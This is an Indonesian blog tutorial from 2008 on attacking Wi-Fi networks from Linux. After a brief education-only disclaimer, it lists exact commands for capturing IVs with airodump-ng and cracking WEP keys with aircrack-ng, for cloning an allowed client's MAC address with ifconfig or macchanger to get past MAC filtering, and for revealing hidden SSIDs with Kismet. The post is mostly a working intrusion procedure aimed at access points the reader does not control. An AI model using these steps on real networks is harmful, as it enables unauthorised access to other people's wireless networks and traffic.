Wireless Hacking di Linux

Desember 31, 2008 at 6:54 pm (LINUX)

Author : BayuDipa

Informasi dan Pengetahuan yang terkandung disini diperuntukan sebagai pembelajaran semata.
Bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan
sendiri dengan aparat penegak hukum.
Ada tiga (3) objektif / tujuan teknik yang akan di terangkan disini, yaitu,

  •  Teknik membobol WEP
  •  Teknik membobol MAC filter.
  •  Teknik melihat Hidden SSID

Asumsi

  •  Chipset Wireless yang digunakan adalah Intel, seperti, ipw2200. Kalau anda cukup beruntung

menggunakan chipset Atheros anda dapat melakukan hal-hal yang lebih dahsyat.
Aplikasi yang perlu disiapkan.
Beberapa paket software yang dibutuhkan

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Scanning Hotspot
Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.

iwlist
Cara yang paling sederhana adalah menggunakan perintah

# iwlist scanning

Kismet
cara yang lebih rumit menggunakan kismet

# apt-get install kismet
# vi /etc/kismet/kismet.conf

source=none,none,addme –> source=ipw3945,wlan0,ipwsource
source=none,none,addme –> source=zd1211,eth1,zysource
Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet

# kismet

airodump
Mematikan mode monitor di WLAN interface eth1

# airmon-ng stop eth1

Mengaktifkan mode monitor di WLAN interface eth1

# airmon-ng start eth1

Scanning melalui WLAN interface eth1

# airodump-ng eth1

Menjebol WEP menggunakan airodump dan aircrack
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini
membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan
susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu,
(1) BSSID / MAC Addresss AP
(2) MAC address WLAN kita
(3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1

Jalankan airodump di WLAN eth1

# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.


Melewati Pembatasan Mac Address

Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di
ijinkan lewat oleh AP menggunakan Kismet adalah

            # kismet

Lakukan
space
S                  – untuk men-sort
S                  – untuk men-sort terhadap SSID
Panah Bawah – Letakan di SSID AP yang kita inginkan.
ENTER     –  detail AP
C                 – lihat siapa saja & MAC address client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1

# airmon-ng stop eth1

Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang
diijinkan AP

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain

# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1

Menemukan Hidden SSID
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <>.

1 Komentar

  1. dlewer said,

    gimana cara mengetahui SSID yang dihidden di Windows?

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: